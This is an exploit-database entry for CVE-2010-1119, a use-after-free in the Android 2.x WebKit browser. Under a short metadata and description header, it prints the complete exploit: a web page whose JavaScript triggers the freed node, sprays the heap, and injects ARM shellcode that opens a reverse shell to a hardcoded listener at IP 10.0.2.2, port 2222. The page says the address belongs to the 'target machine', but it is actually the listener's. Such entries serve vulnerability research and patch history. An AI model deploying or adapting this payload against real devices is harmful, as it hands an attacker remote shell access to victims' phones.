android exploit for 2010-1119 use after free

vendor:

Android

by:

MJ Keith

7.5

CVSS

HIGH

Use After Free

416

CWE

Product Name: Android

Affected Version From: 2

Affected Version To: 2.1.2001

Patch Exists: YES

Related CWE: 2010-1119

CPE: o:android:android

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Android

2011

android exploit for 2010-1119 use after free

This is the exploit used in MJ Keith's Austin bsides presentation that returns a shell. The exploit uses a JavaScript function heap() to create an array of 300 elements, 130 of which are filled with scode and the remaining with scode2 and shell. The shell contains the port and IP address of the target machine.

Mitigation:

Ensure that all software is up to date and patched with the latest security updates.

Source

Exploit-DB raw data:

<html>
<!-- 
# Exploit Title: android exploit for 2010-1119 use after free
# Date: 2011/03/11
# Author: MJ Keith
# Software Link: http://www.android.com/
# Version: 2.0 ,2.1 , 2.1.1
# Tested on: Android
# CVE : 2010-1119

This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };


var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\
\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");
shell += unescape("\uae08"); // Port = 2222
shell += unescape("\u000a\u0202"); // IP = 10.0.2.2
shell += unescape("\u2000\u2000"); // string terminate

 do
 {
  scode += scode;
  scode2 += scode2;

 } while (scode.length<=0x1000);
 
scode2 += shell
 

        target = new Array();
        for(i = 0; i < 300; i++){
          
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}

                  document.write(target[i]);
                  document.write("<br />");
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}

}

 }, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>